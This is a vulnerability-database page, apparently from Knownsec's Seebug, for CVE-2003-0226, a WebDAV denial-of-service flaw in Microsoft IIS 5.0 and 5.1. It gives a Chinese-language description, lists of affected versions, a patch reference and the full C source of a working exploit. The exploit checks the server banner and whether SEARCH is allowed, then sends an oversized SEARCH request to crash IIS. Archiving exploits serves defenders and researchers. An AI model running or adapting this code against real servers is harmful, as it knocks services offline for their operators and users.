MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit

Source

Detail

Contributor Knownsec Got 0KB

漏洞描述： Microsoft IIS 5.0(Internet Infomation Server 5)是Microsoft Windows 2000自带的一个网络信息服务器，其中包含HTTP服务功能。IIS5 默认提供了对WebDAV的支持，通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。 WebDAV实现对部分模式的超长请求处理不正确，远程攻击者可以利用这个漏洞对IIS服务进行拒绝服务攻击。攻击者可以使用'PROPFIND'或'SEARCH'请求方法，提交包含49，153字节的Webdav请求，IIS会由于拒绝服务而重新启动。不过IIS 5.0会自动重新启动。CVE-ID：CVE-2003-0226CNNVD-ID：CNNVD-200306-027CVE官方链接：<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226" rel="nofollow">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0226</a>- 受影响的程序版本 Microsoft IIS 5.1 - Microsoft Windows 2000 Advanced Server SP2  - Microsoft Windows 2000 Advanced Server SP1  - Microsoft Windows 2000 Advanced Server   - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1  - Microsoft Windows 2000 Datacenter Server   - Microsoft Windows 2000 Professional SP2  - Microsoft Windows 2000 Professional SP1  - Microsoft Windows 2000 Professional   - Microsoft Windows 2000 Server SP2  - Microsoft Windows 2000 Server SP1  - Microsoft Windows 2000 Server + Microsoft Windows XP 64-bit Edition SP1 + Microsoft Windows XP 64-bit Edition   + Microsoft Windows XP 64-bit Edition   - Microsoft Windows XP Home SP1  - Microsoft Windows XP Home SP1  - Microsoft Windows XP Home - Microsoft Windows XP Home   + Microsoft Windows XP Professional SP1  + Microsoft Windows XP Professional SP1  + Microsoft Windows XP Professional + Microsoft Windows XP Professional Microsoft IIS 5.0 - Microsoft Windows 2000 Advanced Server SP2  - Microsoft Windows 2000 Advanced Server SP2  - Microsoft Windows 2000 Advanced Server SP1  - Microsoft Windows 2000 Advanced Server SP1  + Microsoft Windows 2000 Advanced Server + Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2  - Microsoft Windows 2000 Datacenter Server SP2  - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP1  - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP2  - Microsoft Windows 2000 Professional SP1  - Microsoft Windows 2000 Professional SP1 + Microsoft Windows 2000 Professional   + Microsoft Windows 2000 Professional   - Microsoft Windows 2000 Server SP2  - Microsoft Windows 2000 Server SP2  - Microsoft Windows 2000 Server SP1  - Microsoft Windows 2000 Server SP1  + Microsoft Windows 2000 Server   + Microsoft Windows 2000 Server Microsoft IIS 6.0 + Microsoft Windows Server 2003 Datacenter Edition   + Microsoft Windows Server 2003 Datacenter Edition   + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition Itanium 0 + Microsoft Windows Server 2003 Enterprise Edition Itanium 0  + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Standard Edition   + Microsoft Windows Server 2003 Web Edition   + Microsoft Windows Server 2003 Web Edition  - 不受影响的程序版本 Microsoft IIS 6.0 + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition   + Microsoft Windows Server 2003 Datacenter Edition Itanium 0  + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 + Microsoft Windows Server 2003 Enterprise Edition   + Microsoft Windows Server 2003 Enterprise Edition   + Microsoft Windows Server 2003 Enterprise Edition Itanium 0  + Microsoft Windows Server 2003 Enterprise Edition Itanium 0 + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows Server 2003 Web Edition  解决方案：官方已发布报告，请升级到不受影响的版本或最新版本。

have 0 exchange

PoC (非 pocsuite 插件)

Contributor Knownsec totally have 0.35KB

/* Microsoft IIS versions 5.0 and 5.1 remote denial of service exploit that makes use of the vulnerability recently published by SPI dynamics Published on 31.05.2003 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib,"ws2_32") void graphitte() {printf("\n********************************** "); printf("\n Webdav MICROSOFT IIS DoS Exploit * \n"); printf("+++++++++++++++++++++++++++++++*\n"); printf(" by Shachank Pandrey *\n"); printf("*************************************\n"); } char *funk(char tobesent[100],char *host) { int s; char got[100]; WSADATA wsaData; struct hostent *yo; struct sockaddr_in heck; char lala[100]; if(WSAStartup(0x0101,&wsaData)!=0) { printf("error starting winsock.."); return 0; } if ((yo = gethostbyname(host))==0){ printf("error: can't resolve '%s'",host); return 0; } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("Error: Unable to create socket"); } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error: Cudn't Connect\r\n"); } memset(lala,0,sizeof(lala)); sprintf(lala,"%s",tobesent,sizeof(tobesent)); send(s,lala,strlen(lala),0); recv(s,got,100,0); return got; closesocket(s); WSACleanup(); printf("done.\n"); } int main(int argc, char *argv[]) { WSADATA wsaData; int s;char mysend[100]; char *gotme; char trash[100]; struct hostent *yo; struct sockaddr_in heck; char buffer[65535] =""; char myrequest[80000]; char content[] = "<?xml version=\"1.0\"?>\r\n" "<g:searchrequest xmlns:g=\"DAV:\">\r\n" "<g:sql>\r\n" "Select \"DAV:displayname\" from scope()\r\n" "</g:sql>\r\n" "</g:searchrequest>\r\n"; graphitte(); if(WSAStartup(0x0101,&wsaData)!=0) { printf("Error :Cudn't initiate winsock!"); return 0; } if(argc<2) {printf("\nUsage : %s <I.P./Hostname>\n\n",argv[0]); exit(0);} if ( (yo = gethostbyname(argv[1]))==0) { printf("error: can't resolve '%s'",argv[1]); return 1; } printf("\nChecking web server %s\n",argv[1]); gotme=(char *)funk("GET / HTTP/1.0\r\n\n",argv[1]); if (strstr(gotme,"IIS/5.0") == NULL) { printf("\n\r----> %s is not running IIS 5.0! adios !\n",argv[1]); } else { printf("\n\r----> Aww rite! IIS 5.0 found on %s !\n",argv[1]); sprintf(mysend,"SEARCH / HTTP/1.0\r\n\n",40); gotme=(char *)funk(mysend,argv[1]); if (strstr(gotme,"HTTP/1.1 411 Length Required") != NULL) { printf("\n\r----> METHOD SEARCH ALLOWED\r\n"); } else { printf("\n----> Method SEARCH not Allowed ! adios...\n"); exit(0); } heck.sin_port = htons(80); heck.sin_family = AF_INET; heck.sin_addr = *((struct in_addr *)yo->h_addr); if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("error: can't create socket"); return 1; } if ((connect(s, (struct sockaddr *) &heck, sizeof(heck))) == -1){ printf("Error:Cudn't Connect\r\n"); return 1; } buffer[sizeof(buffer)]=0x00; memset(buffer,'S',sizeof(buffer)); memset(myrequest,0,sizeof(myrequest)); memset(trash,0,sizeof(trash)); sprintf(myrequest,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\ nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]); sprintf(myrequest,"%s%d\r\n\r\n",myrequest,strlen(content)); printf("\r\nDoSsing the server...<pray>\n"); send(s,myrequest,strlen(myrequest),0); send(s,content,strlen(content),0); recv(s,trash,sizeof(trash),0); if(trash[0]==0x00) { printf("Server is DoSsed! Now run !! F-B-eyee is after j00...\r\n"); } else printf("Server is prolly patched.\r\n"); closesocket(s); } WSACleanup(); return 1; } // milw0rm.com [2003-05-31]

have 4 Exchange

Reference Linking

http://www.microsoft.com/technet/security/bulletin/MS03-018.asp

Solutions

Temp Solutions

Official Solution

Defense Solutions

MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

MS Windows IIS 5.0 - 5.1 Remote Denial of Service Exploit

Basic Fields

Source

Detail

PoC (非 pocsuite 插件)

Reference Linking

Solutions

Timeline

Related Vuls

Need to bind phone before comment. Bind Now

Unavailable Comments

Hello,

Hello,